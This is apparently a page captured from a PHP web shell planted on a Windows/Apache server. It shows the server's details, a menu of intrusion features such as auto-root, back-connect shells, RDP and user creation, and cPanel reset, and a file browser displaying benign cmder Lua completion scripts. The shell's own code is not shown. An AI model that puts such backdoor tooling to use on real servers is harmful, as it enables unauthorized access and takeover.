Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
vendor /
clink-completions /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxrwxrwx
modules
[ DIR ]
drwxrwxrwx
spec
[ DIR ]
drwxrwxrwx
.appveyor.yml
616
B
-rw-rw-rw-
.busted
116
B
-rw-rw-rw-
.cmderver
16
B
-rw-rw-rw-
.gitignore
89
B
-rw-rw-rw-
.init.lua
195
B
-rw-rw-rw-
.luacheckrc
206
B
-rw-rw-rw-
.luacov
162
B
-rw-rw-rw-
.mad-root
0
B
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
README.md
2.05
KB
-rw-rw-rw-
RELEASENOTES.md
8.23
KB
-rw-rw-rw-
angular-cli.lua
4.29
KB
-rw-rw-rw-
chocolatey.lua
4.74
KB
-rw-rw-rw-
coho.lua
2.88
KB
-rw-rw-rw-
cordova.lua
2.99
KB
-rw-rw-rw-
dotnet.lua
5.59
KB
-rw-rw-rw-
git.lua
29.43
KB
-rw-rw-rw-
git_prompt.lua
3.25
KB
-rw-rw-rw-
kubectl.lua
1.92
KB
-rw-rw-rw-
net.lua
1.16
KB
-rw-rw-rw-
npm.lua
6.41
KB
-rw-rw-rw-
nvm.lua
1.06
KB
-rw-rw-rw-
pip.lua
5.4
KB
-rw-rw-rw-
pipenv.lua
3.85
KB
-rw-rw-rw-
scoop.lua
7.75
KB
-rw-rw-rw-
ssh.lua
1.02
KB
-rw-rw-rw-
test.bat
48
B
-rwxrwxrwx
vagrant.lua
4.11
KB
-rw-rw-rw-
yarn.lua
4.63
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vagrant.lua
local matchers = require('matchers') local path = require('path') local parser = clink.arg.new_parser local boxes = matchers.create_dirs_matcher(clink.get_env("userprofile") .. "/.vagrant.d/boxes/*") local function is_empty(s) return s == nil or s == '' end local function find_vagrantfile(start_dir) local vagrantfile_name = clink.get_env("VAGRANT_VAGRANTFILE") if is_empty(vagrantfile_name) then vagrantfile_name = "Vagrantfile" end local function has_vagrantfile(dir) return #clink.find_files(dir .. "./" .. vagrantfile_name .. "*") > 0 end if not start_dir or start_dir == '.' then start_dir = clink.get_cwd() end if has_vagrantfile(start_dir) then return io.open(start_dir.."\\"..vagrantfile_name) end local parent_path = path.pathname(start_dir) if parent_path ~= start_dir then return find_vagrantfile(parent_path) end end local function get_vagrantfile() local vagrant_cwd = clink.get_env("VAGRANT_CWD") if not is_empty(vagrant_cwd) then return find_vagrantfile(vagrant_cwd) else return find_vagrantfile() end end local function delete_ruby_comment(line) if line == nil then return nil end local index = string.find(line, '#') if (not (index == nil) and index > 0) then return string.sub(line, 0, index-1) end return line end local get_provisions = function () local vagrant_file = get_vagrantfile() if vagrant_file == nil then return {} end local provisions = {} for line in vagrant_file:lines() do line = delete_ruby_comment(line) if not is_empty(line) then local provision_name = line:match('.vm.provision[ \r\t]+[\"|\']([A-z]+[A-z0-9|-]*)[\"|\']') if not is_empty(provision_name) then table.insert(provisions, provision_name) end end end vagrant_file:close() return provisions end local vagrant_parser = parser({ "box" .. parser({ "add" .. parser( "--checksum", "--checksum-type" .. parser({"md5", "sha1", "sha256"}), "-c", "--clean", "-f", "--force", "--insecure", "--cacert", "--cert", "--provider" ), "list" .. parser("-i", "--box-info"), "outdated"..parser("--global", "-h", "--help"), "remove" .. parser({boxes}), "repackage" .. parser({boxes}), "update" }), "connect", "destroy" .. parser("-f", "--force"), "global-status", "halt" .. parser("-f", "--force"), "init" .. parser({boxes}, {}, "--output"), "package" .. parser("--base", "--output", "--include", "--vagrantfile"), "plugin" .. parser({ "install" .. parser( "--entry-point", "--plugin-prerelease", "--plugin-source", "--plugin-version" ), "license", "list", "uninstall", "update" .. parser( "--entry-point", "--plugin-prerelease", "--plugin-source", "--plugin-version" ) }), "provision" .. parser("--provision-with" .. parser({get_provisions}), "--no-parallel", "--parallel"), "reload" .. parser("--provision-with" .. parser({get_provisions}), "--no-parallel", "--parallel"), "resume", "ssh" .. parser("-c", "--command", "-p", "--plain") , "ssh-config", "snapshot" .. parser({ "push", "pop" .. parser( "--provision", "--no-provision", "--no-delete"), "save", "restore" .. parser( "--provision", "--no-provision"), "list", "delete"}), "status", "suspend", "up" .. parser( "--provision", "--no-provision", "--provision-with" .. parser({get_provisions}), "--destroy-on-error", "--no-destroy-on-error", "--parallel", "--no-parallel", "--provider" ) }, "-h", "--help", "-v", "--version") local help_parser = parser({ "help" .. parser(vagrant_parser:flatten_argument(1)) }) clink.arg.register_parser("vagrant", vagrant_parser) clink.arg.register_parser("vagrant", help_parser)
Close